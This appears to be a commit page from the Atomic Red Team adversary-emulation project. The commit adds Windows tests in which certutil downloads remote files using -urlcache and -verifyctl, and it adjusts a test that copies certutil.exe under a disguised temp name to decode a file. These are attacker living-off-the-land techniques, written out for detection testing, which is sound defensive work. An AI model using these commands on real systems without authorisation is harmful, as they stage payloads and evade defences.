security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Certutil update (#452)

Browse Source 
* Fixing certutil syntax error

* Adding certutil download tests

* Adding commands to rename download for verifyctl argument

* Fixing type syntax
This commit is contained in:
Keep Watcher
2019-02-14 01:10:39 -05:00
committed by Zac Brown
parent e0d70c657d
commit 02dc3e41ab
2 changed files with 41 additions and 1 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/T1105/T1105.yaml
+40
View File
@@ -170,3 +170,43 @@ atomic_tests:
name: bash
command: |
sftp #{username}@#{remote_host}:#{remote_file} #{local_path}
- name: certutil download (urlcache)
description: |
Use certutil -urlcache argument to download a file from the web. Note - /urlcache also works!
supported_platforms:
- windows
input_arguments:
remote_file:
description: URL of file to copy
type: Url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt
local_path:
description: Local path to place file
type: Path
default: Atomic-license.txt
executor:
name: command_prompt
command: |
cmd /c certutil -urlcache -split -f #{remote_file} #{local_path}
- name: certutil download (verifyctl)
description: |
Use certutil -verifyctl argument to download a file from the web. Note - /verifyctl also works!
supported_platforms:
- windows
input_arguments:
remote_file:
description: URL of file to copy
type: Url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt
local_path:
description: Local path to place file
type: Path
default: Atomic-license.txt
executor:
name: powershell
command: |
$datePath = "certutil-$(Get-Date -format yyyy_MM_dd_HH_mm)"
New-Item -Path $datePath -ItemType Directory
Set-Location $datePath
certutil -verifyctl -split -f #{remote_file}
Get-ChildItem | Where-Object {$_.Name -notlike "*.txt"} | Foreach-Object { Move-Item $_.Name -Destination #{local_path} }
atomics/T1140/T1140.yaml
+1 -1
View File
@@ -39,4 +39,4 @@ atomic_tests:
name: command_prompt
command: |
cmd.exe /c copy %windir%\\system32\\certutil.exe %temp%tcm.tmp
cmd.exe /c %temp%tcm.tmp -decode #{executable}
cmd.exe /c %temp%tcm.tmp -decode #{executable} file.txt